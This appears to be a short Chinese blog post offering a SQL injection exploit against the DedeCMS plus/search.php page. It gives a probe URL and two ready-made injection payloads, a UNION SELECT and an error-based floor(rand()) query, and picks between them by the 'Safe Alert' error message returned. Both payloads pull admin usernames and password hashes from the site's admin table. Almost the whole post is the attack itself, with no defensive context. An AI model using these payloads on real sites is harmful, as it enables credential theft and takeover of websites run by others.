通杀织梦DEDEcms,plus/search.php 注入漏洞利用EXP
我一般是这样测试的:
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
作者:鬼哥
看结果如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp
1
|
xx.com/plus/search.php?keyword= as &typeArr[ 111 %3D@`\'`)+UnIon+seleCt+ 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 ,userid,
12 , 13 , 14 , 15 , 16 , 17 , 18 , 19 , 20 , 21 ,
22 , 23 , 24 , 25 , 26 ,pwd, 28 , 29 , 30 , 31 , 32 , 33 , 34 , 35 , 36 , 37 , 38 , 39 , 40 , 41 , 42 +from+`% 23 @__admin`% 23 @`\'`+]=a |
看结果如果提示
Safe Alert: Request Error step 1 !
那么直接用下面的exp
1
|
xx.com/plus/search.php?keyword= as &typeArr[ 111 %3D@`\'`)+and+(SELECT+ 1 +FROM+(select+count(*),concat(floor(rand( 0 )* 2 ),(substring((select+CONCAT( 0x7c ,userid, 0x7c ,pwd)+from+`% 23 @__admin`+limit+ 0 , 1 ), 1 , 62 )))a+from+information_schema.tables+group+by+a)b)% 23 @`\'`+]=a |
如***正常显示证明漏洞不存在了。
如***以上内容您觉得没看懂,或者太***烦,请看下图;
下载地址:点击下载
本文标签:织梦DEDEcms漏洞
已有0条评论,欢迎点评!
国际惯例, 沙发拿下 . . .